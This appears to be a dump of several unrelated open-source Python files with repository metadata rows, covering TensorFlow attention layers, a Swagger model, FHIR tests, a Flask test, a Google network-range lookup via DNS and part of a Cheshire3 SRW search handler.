dtype=tf.float32,
initializer=tf.constant_initializer(5.0),
collections=[tf.GraphKeys.GLOBAL_VARIABLES,
'softmax_temperatures'])
score = tf.truediv(score, softmax_temperature)
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
class MultiHeadAdd(MultiHeadAttV3):
"""
Implements Toronto-style (Xu et al.) attention scoring,
as described in:
"Show, Attend and Tell: Neural Image Caption Generation with
Visual Attention." ICML 2015. https://arxiv.org/abs/1502.03044
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'MultiHeadAdd', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1)
v = tf.get_variable(
'attention_v', [self._num_units], dtype=proj_query.dtype)
if len(self._mask_params) > 0:
v, _ = masked_layer.generate_masks(kernel=v,
bias=None,
dtype=proj_query.dtype,
**self._mask_params)
score = self._keys + proj_query
score = tf.nn.tanh(score)
score = tf.multiply(score, v)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
class MultiHeadDot(MultiHeadAttV3):
"""
Implements scaled dot-product scoring,
as described in:
"Attention is all you need." NIPS 2017.
https://papers.nips.cc/paper/7181-attention-is-all-you-need.pdf
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'MultiHeadDot', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1) # (batch_size, 1, num_units)
score = tf.multiply(self._keys, proj_query)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
            # python-side scalar sqrt; tf.sqrt would reject an integer input
            score /= (float(self._num_units) / self._num_heads) ** 0.5
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
# noinspection PyProtectedMember
class MultiHeadAttentionWrapperV3(attention_wrapper.AttentionWrapper):
"""
Wraps another `RNNCell` with attention, similar to `AttentionWrapper`.
Allows optional multi-head attention.
Logits projection should be performed at the decoder by passing in
an instance of `tf.layers.Layer`, as argument for `output_layer`.
    alignments_keep_prob: If the value is below 1.0, dropout is applied to the attention alignments.
"""
# TODO: bookmark
def __init__(self,
context_layer=True,
alignments_keep_prob=1.0,
mask_type=None,
mask_init_value=0,
mask_bern_sample=False,
**kwargs):
logger.debug('Using {}.'.format(self.__class__.__name__))
super(MultiHeadAttentionWrapperV3, self).__init__(**kwargs)
if len(self._attention_mechanisms) != 1:
raise ValueError('Only a single attention mechanism can be used.')
self._context_layer = context_layer
self._alignments_keep_prob = alignments_keep_prob
if mask_type is None:
self._dense_layer = Dense
self._mask_params = {}
else:
self._dense_layer = masked_layer.MaskedDense
self._mask_params = dict(mask_type=mask_type,
mask_init_value=mask_init_value,
mask_bern_sample=mask_bern_sample)
# noinspection PyCallingNonCallable
def call(self, inputs, prev_state):
"""
Perform a step of attention-wrapped RNN.
This method assumes `inputs` is the word embedding vector.
This method overrides the original `call()` method.
"""
_attn_mech = self._attention_mechanisms[0]
attn_size = _attn_mech._num_units
batch_size = _attn_mech.batch_size
dtype = inputs.dtype
# Step 1: Calculate the true inputs to the cell based on the
# previous attention value.
# `_cell_input_fn` defaults to
# `lambda inputs, attention: array_ops.concat([inputs, attention], -1)`
_dprint('{}: prev_state received by call(): {}'.format(
self.__class__.__name__, prev_state))
cell_inputs = self._cell_input_fn(inputs, prev_state.attention)
prev_cell_state = prev_state.cell_state
cell_output, curr_cell_state = self._cell(cell_inputs, prev_cell_state)
cell_batch_size = (cell_output.shape[0].value or tf.shape(cell_output)[0])
error_message = (
"When applying AttentionWrapper %s: " % self.name +
"Non-matching batch sizes between the memory (encoder output) "
"and the query (decoder output). Are you using the "
"BeamSearchDecoder? You may need to tile your memory input via "
"the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with tf.control_dependencies(
[tf.assert_equal(cell_batch_size, _attn_mech.batch_size, message=error_message)]):
cell_output = tf.identity(cell_output, name="checked_cell_output")
dtype = cell_output.dtype
assert len(self._attention_mechanisms) == 1
_attn_mech = self._attention_mechanisms[0]
alignments, attention_state = _attn_mech(cell_output, state=None)
if self._alignments_keep_prob < 1.:
alignments = tf.contrib.layers.dropout(inputs=alignments,
keep_prob=self._alignments_keep_prob,
noise_shape=None,
is_training=True)
if len(_shape(alignments)) == 3:
# Multi-head attention
# Expand from [batch_size, num_heads, memory_time] to [batch_size, num_heads, 1, memory_time]
expanded_alignments = tf.expand_dims(alignments, 2)
# attention_mechanism.values shape is
# [batch_size, num_heads, memory_time, num_units / num_heads]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, num_heads, 1, num_units / num_heads].
# we then combine the heads
# [batch_size, 1, attention_mechanism.num_units]
attention_mechanism_values = _attn_mech.values_split
context = tf.matmul(expanded_alignments, attention_mechanism_values)
attention = tf.squeeze(combine_heads(context), [1])
else:
# Expand from [batch_size, memory_time] to [batch_size, 1, memory_time]
expanded_alignments = tf.expand_dims(alignments, 1)
# Context is the inner product of alignments and values along the
# memory time dimension.
# alignments shape is
# [batch_size, 1, memory_time]
# attention_mechanism.values shape is
# [batch_size, memory_time, attention_mechanism.num_units]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, 1, attention_mechanism.num_units].
# we then squeeze out the singleton dim.
attention_mechanism_values = _attn_mech.values
context = tf.matmul(expanded_alignments, attention_mechanism_values)
attention = tf.squeeze(context, [1])
# Context projection
if self._context_layer:
# noinspection PyCallingNonCallable
attention = self._dense_layer(name='a_layer',
units=_attn_mech._num_units,
use_bias=False,
activation=None,
dtype=dtype,
**self._mask_params)(attention)
if self._alignment_history:
alignments = tf.reshape(alignments, [cell_batch_size, -1])
alignment_history = prev_state.alignment_history.write(prev_state.time, alignments)
else:
alignment_history = ()
curr_state = attention_wrapper.AttentionWrapperState(
time=prev_state.time + 1,
cell_state=curr_cell_state,
attention=attention,
attention_state=alignments,
alignments=alignments,
alignment_history=alignment_history
)
return cell_output, curr_state
@property
def state_size(self):
state = super(MultiHeadAttentionWrapperV3, self).state_size
_attn_mech = self._attention_mechanisms[0]
s = _shape(_attn_mech._values_split)[1:3]
state = state._replace(alignments=s[0] * s[1],
alignment_history=s[0] * s[1] if self._alignment_history else (),
attention_state=s[0] * s[1])
if _attn_mech._fm_projection is None and self._context_layer is False:
state = state.clone(attention=_attn_mech._feature_map_shape[-1])
else:
state = state.clone(attention=_attn_mech._num_units)
_dprint('{}: state_size: {}'.format(self.__class__.__name__, state))
return state
# noinspection PyProtectedMember
def zero_state(self, batch_size, dtype):
state = super(MultiHeadAttentionWrapperV3, self).zero_state(
batch_size, dtype)
_attn_mech = self._attention_mechanisms[0]
tf_ary_kwargs = dict(dtype=dtype,
size=0,
dynamic_size=True,
element_shape=None)
if _attn_mech._fm_projection is None and self._context_layer is False:
state = state._replace(
attention=tf.zeros(
[batch_size, _attn_mech._feature_map_shape[-1]], dtype),
alignment_history=tf.TensorArray(**tf_ary_kwargs) if self._alignment_history else ())
else:
state = state._replace(
attention=tf.zeros(
[batch_size, _attn_mech._num_units], dtype),
alignment_history=tf.TensorArray(**tf_ary_kwargs) if self._alignment_history else ())
_dprint('{}: zero_state: {}'.format(self.__class__.__name__, state))
return state
class BeamSearchDecoderMultiHead(tf.contrib.seq2seq.BeamSearchDecoder):
# noinspection PyProtectedMember
def _maybe_sort_array_beams(self, t, parent_ids, sequence_length):
"""Maybe sorts beams within a `TensorArray`.
Args:
t: A `TensorArray` of size `max_time` that contains `Tensor`s of shape
`[batch_size, beam_width, s]` or `[batch_size * beam_width, s]` where
`s` is the depth shape.
parent_ids: The parent ids of shape `[max_time, batch_size, beam_width]`.
sequence_length: The sequence length of shape `[batch_size, beam_width]`.
Returns:
A `TensorArray` where beams are sorted in each `Tensor` or `t` itself if
it is not a `TensorArray` or does not meet shape requirements.
"""
if not isinstance(t, tf.TensorArray):
return t
# pylint: disable=protected-access
if (not t._infer_shape or not t._element_shape
or t._element_shape[0].ndims is None
or t._element_shape[0].ndims < 1):
shape = (
t._element_shape[0] if t._infer_shape and t._element_shape
else tf.TensorShape(None))
            tf.logging.warn("The TensorArray %s in the cell state is not amenable to "
"sorting based on the beam search result. For a "
"TensorArray to be sorted, its elements shape must be "
"defined and have at least a rank of 1, but saw shape: %s"
% (t.handle.name, shape))
return t
# shape = t._element_shape[0]
# pylint: enable=protected-access
# if not _check_static_batch_beam_maybe(
# shape, tensor_util.constant_value(self._batch_size), self._beam_width):
# return t
t = t.stack()
with tf.control_dependencies(
[_check_batch_beam(t, self._batch_size, self._beam_width)]):
return gather_tree_from_array(t, parent_ids, sequence_length)
| [
"[email protected]"
] | |
b0ad500120f8469b888e170431f17043052f3e7c | d57148c74b79954ff762ce3a02c1b0ef3e79d6a1 | /libs/smartmeshsdk-REL-1.3.0.1/libs/VManagerSDK/vmanager/models/net_reset_info.py | f58017d71ca05bfc882e34f73a9d91a3d9409ea4 | [
"BSD-3-Clause"
] | permissive | realms-team/solmanager | 62fb748b140361cf620b7dd8ff6df755afd42bbe | 95fa049df041add5f8d37c053ef560d0e5d06dff | refs/heads/master | 2020-04-11T10:00:21.086457 | 2018-11-20T15:49:27 | 2018-11-20T15:49:27 | 40,271,406 | 0 | 0 | BSD-3-Clause | 2018-11-20T15:49:28 | 2015-08-05T22:15:39 | Python | UTF-8 | Python | false | false | 3,061 | py | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class NetResetInfo(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
NetResetInfo - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'reload': 'bool'
}
self.attribute_map = {
'reload': 'reload'
}
self._reload = None
@property
def reload(self):
"""
Gets the reload of this NetResetInfo.
reload configuration after reset
:return: The reload of this NetResetInfo.
:rtype: bool
"""
return self._reload
@reload.setter
def reload(self, reload):
"""
Sets the reload of this NetResetInfo.
reload configuration after reset
:param reload: The reload of this NetResetInfo.
:type: bool
"""
self._reload = reload
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
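# Minimal usage sketch (illustrative only; 'reload' is the lone model field):
#   info = NetResetInfo()
#   info.reload = True
#   info.to_dict()  # -> {'reload': True}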
| [
"[email protected]"
] | |
9c50ac850f1e9d03b9356f0e58aa62b4a72ac2d5 | be61a9f30274514857ea34297719157f1e5b8447 | /fhir/resources/DSTU2/tests/test_provenance.py | 7ef6baef182c10f5c8210085602e62a429fe450a | [
"BSD-3-Clause"
] | permissive | jwygoda/fhir.resources | ceff3a620100d2e875136b86d3e82816c0e60a33 | 5053565570d1ca992d9971d20db813c53fd350b9 | refs/heads/master | 2021-02-05T02:59:17.436485 | 2019-07-18T10:57:33 | 2019-07-18T10:57:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,361 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 on 2019-05-14.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import provenance
from .fhirdate import FHIRDate
class ProvenanceTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Provenance", js["resourceType"])
return provenance.Provenance(js)
def testProvenance1(self):
inst = self.instantiate_from("provenance-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Provenance instance")
self.implProvenance1(inst)
js = inst.as_json()
self.assertEqual("Provenance", js["resourceType"])
inst2 = provenance.Provenance(js)
self.implProvenance1(inst2)
def implProvenance1(self, inst):
self.assertEqual(inst.agent[0].relatedAgent[0].target, "#a1")
self.assertEqual(inst.agent[0].relatedAgent[0].type.text, "used")
self.assertEqual(inst.agent[0].role.code, "author")
self.assertEqual(inst.agent[0].role.system, "http://hl7.org/fhir/provenance-participant-role")
self.assertEqual(inst.agent[0].userId.system, "http://acme.com/fhir/users/sso")
self.assertEqual(inst.agent[0].userId.value, "hhd")
self.assertEqual(inst.agent[1].id, "a1")
self.assertEqual(inst.agent[1].role.code, "DEV")
self.assertEqual(inst.agent[1].role.system, "http://hl7.org/fhir/v3/ParticipationType")
self.assertEqual(inst.entity[0].display, "CDA Document in XDS repository")
self.assertEqual(inst.entity[0].reference, "DocumentReference/90f55916-9d15-4b8f-87a9-2d7ade8670c8")
self.assertEqual(inst.entity[0].role, "source")
self.assertEqual(inst.entity[0].type.code, "57133-1")
self.assertEqual(inst.entity[0].type.display, "Referral note")
self.assertEqual(inst.entity[0].type.system, "http://loinc.org")
self.assertEqual(inst.id, "example")
self.assertEqual(inst.period.start.date, FHIRDate("2015-06-27").date)
self.assertEqual(inst.period.start.as_json(), "2015-06-27")
self.assertEqual(inst.policy[0], "http://acme.com/fhir/Consent/25")
self.assertEqual(inst.reason[0].coding[0].code, "3457005")
self.assertEqual(inst.reason[0].coding[0].display, "Referral")
self.assertEqual(inst.reason[0].coding[0].system, "http://snomed.info/sct")
self.assertEqual(inst.reason[0].text, "Accepting a referral")
self.assertEqual(inst.recorded.date, FHIRDate("2015-06-27T08:39:24+10:00").date)
self.assertEqual(inst.recorded.as_json(), "2015-06-27T08:39:24+10:00")
self.assertEqual(inst.text.div, "<div>procedure record authored on 27-June 2015 by Harold Hippocrates, MD Content extracted from Referral received 26-June</div>")
self.assertEqual(inst.text.status, "generated")
def testProvenance2(self):
inst = self.instantiate_from("provenance-example-sig.json")
self.assertIsNotNone(inst, "Must have instantiated a Provenance instance")
self.implProvenance2(inst)
js = inst.as_json()
self.assertEqual("Provenance", js["resourceType"])
inst2 = provenance.Provenance(js)
self.implProvenance2(inst2)
def implProvenance2(self, inst):
self.assertEqual(inst.activity.coding[0].code, "AU")
self.assertEqual(inst.activity.coding[0].display, "authenticated")
self.assertEqual(inst.activity.coding[0].system, "http://hl7.org/fhir/v3/DocumentCompletion")
self.assertEqual(inst.agent[0].role.code, "verifier")
self.assertEqual(inst.agent[0].role.system, "http://hl7.org/fhir/provenance-participant-role")
self.assertEqual(inst.agent[0].userId.system, "http://acme.com/fhir/users/sso")
self.assertEqual(inst.agent[0].userId.value, "hhd")
self.assertEqual(inst.id, "signature")
self.assertEqual(inst.reason[0].coding[0].code, "TREAT")
self.assertEqual(inst.reason[0].coding[0].display, "treatment")
self.assertEqual(inst.reason[0].coding[0].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.recorded.date, FHIRDate("2015-08-27T08:39:24+10:00").date)
self.assertEqual(inst.recorded.as_json(), "2015-08-27T08:39:24+10:00")
self.assertEqual(inst.signature[0].blob, "Li4u")
self.assertEqual(inst.signature[0].contentType, "application/signature+xml")
self.assertEqual(inst.signature[0].type[0].code, "1.2.840.10065.1.12.1.5")
self.assertEqual(inst.signature[0].type[0].display, "Verification")
self.assertEqual(inst.signature[0].type[0].system, "http://hl7.org/fhir/valueset-signature-type")
self.assertEqual(inst.signature[0].when.date, FHIRDate("2015-08-27T08:39:24+10:00").date)
self.assertEqual(inst.signature[0].when.as_json(), "2015-08-27T08:39:24+10:00")
self.assertEqual(inst.text.div, "<div>procedure record authored on 27-June 2015 by Harold Hippocrates, MD Content extracted from Referral received 26-June</div>")
self.assertEqual(inst.text.status, "generated")
| [
"[email protected]"
] | |
060cab4de8f90448bb3a7351dec20cafcc81a448 | 3b593b412c663a34784b1f60ad07cd2ee6ef87d1 | /month01/python base/day04/exercise05.py | 37e1bf28579cef5876ac0302e9c634075a9418dc | [] | no_license | ShijieLiu-PR/Python_Learning | 88694bd44aeed4f8b022202c1065342bd17c26d2 | ed01cc0956120ea287c51667604db97ff563c829 | refs/heads/master | 2023-05-22T16:35:24.252313 | 2021-06-16T10:56:21 | 2021-06-16T10:56:21 | 337,445,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | # 练习5:在控制台中输入一个整数,根据整数打印一个正方形。如下:
"""
****
* *
* *
****
"""
size = int(input("Please input an int:"))
for item in range(size):
if item == 0 or item == size - 1:
print("*" * size)
else:
print("*" + " " * (size - 2) + "*")
| [
"[email protected]"
] | |
3ca4847d2fcea8e14b515ef04ca57fdbab37f57c | 4f770819f1b9ce66c847873f02d65a7250d3c0b9 | /myapp/test.py | ffb04a90d437b452a9827535e387313d97b522c9 | [] | no_license | alexaugusto23/Moscow_Ring_Road_Coordinates | 58ec6b606679aab34d0941b7c57374071b3821ad | 51daf7f88e9b2c02df174a44931c86afc079aeb1 | refs/heads/main | 2023-08-31T14:26:08.446962 | 2021-09-19T01:43:21 | 2021-09-19T01:43:21 | 405,960,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | import unittest
from app import app
import re
class TestHomeView(unittest.TestCase):
'''
As all 3 test cases do a get home "/"
from our application, we define the setUp function. she is executed
automatically whenever unittest instantiates the TestHomeView class.
The setUp function is similar to a constructor method.
'''
def setUp(self):
my_app = app.test_client()
self.response_root = my_app.get('/')
self.response_form = my_app.get('/form')
    # Test that the response status is 200 ("OK")
def test_get(self):
self.assertEqual(200, self.response_root.status_code)
    # Test that the home response has the correct content_type
def test_content_type(self):
self.assertIn('text/html', self.response_root.content_type)
    # Test that the /form response matches the expected string pattern
def test_html_string_response(self):
string = self.response_form.data.decode('utf-8')
print(string)
padrao = "([0-9]{0,1000000000}) ([a-z]{2})"
resposta = re.search(padrao, string).group()
print(resposta)
self.assertEqual( resposta, self.response_form.data.decode('utf-8') )
if __name__ == '__main__':
log_file = 'log_file.txt'
with open(log_file, "w") as file:
runner = unittest.TextTestRunner(file)
unittest.main(testRunner=runner)
runner.close()
# python -m unittest test.py | [
"[email protected]"
] | |
be1ad681d98b756c3bd0497d05278e59db83c92b | 5017db085d3316e7954fa9beb258ab964cc0beb5 | /netlookup/network_sets/google.py | 6e6626a13ab2d04d3ad71db33ae57441be13b84c | [
"BSD-3-Clause"
] | permissive | hile/netlookup | 698e68577096fbb74daa9ba205624ddc49b357e4 | 1bc00271500d4daa279acc11590b5dcf40a0b85e | refs/heads/main | 2023-07-19T20:43:42.855035 | 2023-07-09T03:02:00 | 2023-07-09T03:02:00 | 191,030,505 | 0 | 0 | NOASSERTION | 2023-02-11T02:23:41 | 2019-06-09T16:36:59 | Python | UTF-8 | Python | false | false | 3,324 | py | #
# Copyright (C) 2020-2023 by Ilkka Tuohela <[email protected]>
#
# SPDX-License-Identifier: BSD-3-Clause
#
"""
Google services address prefix set
"""
import re
from datetime import datetime
from operator import attrgetter
from typing import Optional
from dns import resolver
from ..exceptions import NetworkError
from .base import NetworkSet, NetworkSetItem
RE_INCLUDE = re.compile(r'^include:(?P<rr>.*)$')
RE_IPV4 = re.compile(r'^ip4:(?P<prefix>.*)$')
RE_IPV6 = re.compile(r'^ip6:(?P<prefix>.*)$')
GOOGLE_CLOUD_ADDRESS_LIST_RECORD = '_cloud-netblocks.googleusercontent.com'
GOOGLE_SERVICES_ADDRESS_LIST_RECORD = '_spf.google.com'
def google_rr_dns_query(record: str) -> Optional[str]:
"""
DNS query to get TXT record list of google networks
"""
try:
res = resolver.resolve(record, 'TXT')
return str(res.rrset[0].strings[0], 'utf-8')
except (resolver.NoAnswer, resolver.NXDOMAIN) as error:
raise NetworkError(f'Error querying TXT record for {record}: {error}') from error
def process_google_rr_ranges(record: str, loader_class):
"""
Process RR records from google DNS query response
"""
networks = []
includes = []
for field in google_rr_dns_query(record).split(' '):
match = RE_IPV4.match(field)
if match:
networks.append(loader_class(match.groupdict()['prefix']))
continue
match = RE_IPV6.match(field)
if match:
networks.append(loader_class(match.groupdict()['prefix']))
continue
match = RE_INCLUDE.match(field)
if match:
include = match.groupdict()['rr']
networks.extend(
process_google_rr_ranges(include, loader_class)
)
includes.append(include)
continue
return networks
class GoogleNetworkSet(NetworkSet):
"""
Google network set with data for TXT DNS records
"""
@property
def __address_list_record__(self) -> None:
raise NotImplementedError
def fetch(self) -> None:
"""
Fetch Google Cloud network records from DNS
"""
self.__networks__.clear()
networks = process_google_rr_ranges(self.__address_list_record__, self.loader_class)
for network in networks:
self.__networks__.append(network)
self.updated = datetime.now()
self.__networks__.sort(key=attrgetter('version', 'cidr'))
class GoogleCloudPrefix(NetworkSetItem):
"""
Google cloud network prefix
"""
type = 'google-cloud'
class GoogleCloud(GoogleNetworkSet):
"""
Google Cloud address ranges
"""
type: str = 'google-cloud'
cache_filename: str = 'google-cloud-networks.json'
loader_class = GoogleCloudPrefix
@property
def __address_list_record__(self) -> str:
return GOOGLE_CLOUD_ADDRESS_LIST_RECORD
class GoogleServicePrefix(NetworkSetItem):
"""
Google services network prefix
"""
type = 'google'
class GoogleServices(GoogleNetworkSet):
"""
Google services address ranges
"""
type: str = 'google'
cache_filename: str = 'google-service-networks.json'
loader_class = GoogleServicePrefix
@property
def __address_list_record__(self) -> str:
return GOOGLE_SERVICES_ADDRESS_LIST_RECORD
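# Illustrative sketch (performs live DNS lookups, so results will vary):
#   networks = process_google_rr_ranges(GOOGLE_SERVICES_ADDRESS_LIST_RECORD,
#                                       GoogleServicePrefix)
#   for prefix in networks:
#       print(prefix)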
| [
"[email protected]"
] | |
1c9ad65b85f7f793307ac30b98a6775a9dee079b | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_173/ch20_2020_03_04_20_04_41_273583.py | 24e06e78098124022a59a5bfb6d4b88ca932758a | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | distancia = float(input('Escreva a distância que você quer percorrer em km'))
if distancia <= 200:
valor = 0.5*distancia
else:
valor = 0.45*distancia + 100
print(valor)
"[email protected]"
] | |
b6c02ef994d8aeabf68bfdecae107c5fc0bc404c | 5fdcb39eaa9d1f44e2ba0130bc0d6ece3f5ff354 | /code/cheshire3/web/srwHandler.py | 7ea429dc225a21f7918e3b0a4d832d549d429102 | [] | no_license | Cheshire-Grampa/cheshire3 | 0a653d6372497290d938e098b6acf8366348133f | 616ab36cd8442cd5f4712a9fccf65ca7ae9f692c | refs/heads/master | 2020-12-25T07:26:16.366754 | 2012-06-06T09:52:53 | 2012-06-06T10:32:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,168 | py |
# Handlers for SRW Operations
# Version: 1.1
# Author: Rob Sanderson ([email protected])
# John Harrison ([email protected])
#
# Version History:
# 08/10/2007 - JH - Automatic insertion of database metadata into explain response
# 06/12/2007 - JH - Some extension handling fixes
#
import os, sys, re
import SRW
import SRW.types
from ZSI import *
from PyZ3950.SRWDiagnostics import *
from xml.sax.saxutils import escape
from srwExtensions import *
from cheshire3.baseObjects import Session, RecordStore
from cheshire3.document import StringDocument
from cheshire3.utils import flattenTexts
from cheshire3 import internal
import cheshire3.cqlParser as CQLParser
# -------------------------------------------------------------------
# Data transformations
#
# NB: Sort Keys from Version 1.0 and 1.1
# Version 1.2 uses CQL to carry sort info, so this becomes redundant
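# A 1.0/1.1 sortKeys value is a space-separated list of keys, each key a
# comma-separated tuple of path,schema,ascending,caseSensitive,missingValue,
# e.g. (illustrative only):  dc.title,,1,0,highValue dc.date,,0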
def parseSortKeys(self):
" Parse sortKeys parameter to sortStructure "
self.sortStructure = []
if (self.sortKeys):
# First try some simple parsing...
self.sortKeys = self.sortKeys.strip()
sks = self.sortKeys.split()
# TODO: Maybe write better sortKey parser
if (len(sks) > 1):
for s in sks:
if not (s[0] in ['"', '/']):
                    # Paths should always start with / or "; anything else is malformed
pass
skObjects = []
for skstr in sks:
sko = SRW.types.SortKey('sortKey')
sk = skstr.split(",")
sko.path = sk[0]
try:
sko.schema = sk[1]
sko.ascending = int(sk[2])
sko.caseSensitive = int(sk[3])
sko.missingValue = sk[4]
except:
# No problems if these fail from indexError
pass
skObjects.append(sko)
self.sortStructure = skObjects
SRW.types.SearchRetrieveRequest.parseSortKeys = parseSortKeys
def process_extraData(hash, req, resp, other=None):
for ((uri, name), fn) in hash.iteritems():
# Check name in request, call fn
# XXX: probably need to do this recursively...
for node in req.extraRequestData:
if node.localName == name and node.namespaceURI == uri:
fn(req, resp, other)
# XXX: too much descending here - John
# elem = node.childNodes[0]
# if elem.localName == name and elem.namespaceURI == uri:
# fn(req, resp, other)
# ---- Main query handler ----
xmlver = re.compile("[ ]*<\?xml[^>]+>")
def process_searchRetrieve(self, session, req):
if (not req.version):
diag = Diagnostic7()
diag.message = "Mandatory 'version' parameter not supplied"
diag.details = 'version'
raise diag
# Get our config based on URL
config = req.config
db = config.parent
session.database = db.id
rss = db.get_object(session, 'defaultResultSetStore')
# Setup for processing
if (req.query != ""):
req.queryStructure = CQLParser.parse(req.query)
else:
# No Query, Request is seriously Broken
f = Diagnostic7()
f.message = 'Request must include a query'
f.details = 'query'
raise f
req.queryStructure.config = config
req.xQuery = req.queryStructure.toXCQL()
self.echoedSearchRetrieveRequest = req
req.parseSortKeys()
if (req.diagnostics):
self.diagnostics = req.diagnostics
return
# Check if we recognise the record Schema
schema = req.get('recordSchema')
# Redirect to full value
if (config.recordNamespaces.has_key(schema)):
schema = config.recordNamespaces[schema]
if (not schema in config.recordNamespaces.values()):
diag = Diagnostic66()
diag.details = schema
raise diag
txr = config.transformerHash.get(schema, None)
recordPacking = req.get('recordPacking')
if not recordPacking in ["string", "xml"]:
diag = Diagnostic71()
diag.details = req.recordPacking;
raise diag
# Fencepost. SRW starts at 1, C3 starts at 0
startRecord = req.get('startRecord') -1
maximumRecords = req.get('maximumRecords')
ttl = req.get('resultSetTTL')
nsk = len(req.sortStructure)
rsn = req.queryStructure.getResultSetId()
rs = db.search(session, req.queryStructure)
recs = []
if (rs != None):
self.numberOfRecords = len(rs)
if (ttl and not rsn):
rs.expires = ttl
rsn = rss.create_resultSet(session, rs)
self.records = []
end = min(startRecord+maximumRecords, len(rs))
for rIdx in range(startRecord, end):
rsi = rs[rIdx]
r = rsi.fetch_record(session)
ro = SRW.types.Record('record')
ro.recordPacking = recordPacking
ro.recordSchema = schema
if (txr != None):
doc = txr.process_record(session, r)
rec = doc.get_raw(session)
rec = xmlver.sub("", rec)
else:
rec = r.get_xml(session)
if recordPacking == "string":
ro.recordData = escape(rec)
else:
ro.recordData = rec
process_extraData(config.recordExtensionHash, req, ro, r)
recs.append(ro)
self.records = recs
nrp = end + 1 # Back to SRU 1-based recordPosition
if ( nrp < self.numberOfRecords and nrp > 0):
self.nextRecordPosition = nrp
if (rsn):
self.resultSetId = rsn
self.resultSetIdleTime = ttl
else:
self.numberOfRecords = 0
self.extraResponseData = [] # empty to prevent data from previous requests
process_extraData(config.searchExtensionHash, req, self, rs)
process_extraData(config.responseExtensionHash, req, self)
SRW.types.SearchRetrieveResponse.processQuery = process_searchRetrieve
def process_scan(self, session, req):
# Process a scan query
config = req.config
db = config.parent
session.database = db.id
self.terms = []
if (not req.version):
diag = Diagnostic7()
diag.message = "Mandatory 'version' parameter not supplied"
diag.details = 'version'
raise diag
if req.scanClause:
#convert clause into SearchClause object
clause = CQLParser.parse(req.scanClause)
# Stupid schema.
xsc = []
xsc.append(clause.index.toXCQL())
xsc.append(clause.relation.toXCQL())
xsc.append(clause.term.toXCQL())
req.xScanClause = "".join(xsc)
else:
# Seriously broken request.
f = Diagnostic7()
f.message = 'Request must include a query'
f.details = 'scanClause'
raise f
self.echoedScanRequest = req
if (req.diagnostics):
